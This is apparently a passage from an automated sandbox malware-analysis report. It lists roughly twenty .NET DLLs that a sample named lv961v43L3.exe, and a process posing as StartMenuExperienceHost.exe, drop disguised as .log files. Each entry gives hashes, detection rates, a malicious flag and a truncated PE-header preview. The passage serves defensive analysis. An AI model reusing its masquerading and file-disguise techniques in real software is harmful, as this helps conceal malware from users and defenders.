                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):46592
                                                                Entropy (8bit):5.870612048031897
                                                                Encrypted:false
                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\aBctEWCA.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33792
                                                                Entropy (8bit):5.541771649974822
                                                                Encrypted:false
                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\aJMMjFdF.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34304
                                                                Entropy (8bit):5.618776214605176
                                                                Encrypted:false
                                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\blrDaWHv.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38912
                                                                Entropy (8bit):5.679286635687991
                                                                Encrypted:false
                                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\ciTLwWWp.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.660491370279985
                                                                Encrypted:false
                                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                MD5:240E98D38E0B679F055470167D247022
                                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\ekFuRFbl.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):294912
                                                                Entropy (8bit):6.010605469502259
                                                                Encrypted:false
                                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                C:\Users\user\Desktop\erTkMTCt.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):41472
                                                                Entropy (8bit):5.6808219961645605
                                                                Encrypted:false
                                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\gBplMliu.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34816
                                                                Entropy (8bit):5.636032516496583
                                                                Encrypted:false
                                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\jFctadEf.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):126976
                                                                Entropy (8bit):6.057993947082715
                                                                Encrypted:false
                                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                C:\Users\user\Desktop\kTLTKyNc.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):5.932541123129161
                                                                Encrypted:false
                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                C:\Users\user\Desktop\kjvJoyHh.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.629584586954759
                                                                Encrypted:false
                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\ksfcTiin.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38912
                                                                Entropy (8bit):5.679286635687991
                                                                Encrypted:false
                                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\oTYKBhgS.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):23552
                                                                Entropy (8bit):5.519109060441589
                                                                Encrypted:false
                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\pHdSnvcQ.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):64000
                                                                Entropy (8bit):5.857602289000348
                                                                Encrypted:false
                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\rJPAIehM.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.629584586954759
                                                                Encrypted:false
                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\sVoRDbyU.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):5.932541123129161
                                                                Encrypted:false
                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                C:\Users\user\Desktop\vzGrPbhF.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):41472
                                                                Entropy (8bit):5.6808219961645605
                                                                Encrypted:false
                                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\xIFQfYNI.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):46592
                                                                Entropy (8bit):5.870612048031897
                                                                Encrypted:false
                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\yGhYBYcD.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):294912
                                                                Entropy (8bit):6.010605469502259
                                                                Encrypted:false
                                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                C:\Users\user\Desktop\yHDAltbA.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):70144
                                                                Entropy (8bit):5.909536568846014
                                                                Encrypted:false
                                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Users\user\Desktop\ysVaBXSD.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):85504
                                                                Entropy (8bit):5.8769270258874755
                                                                Encrypted:false
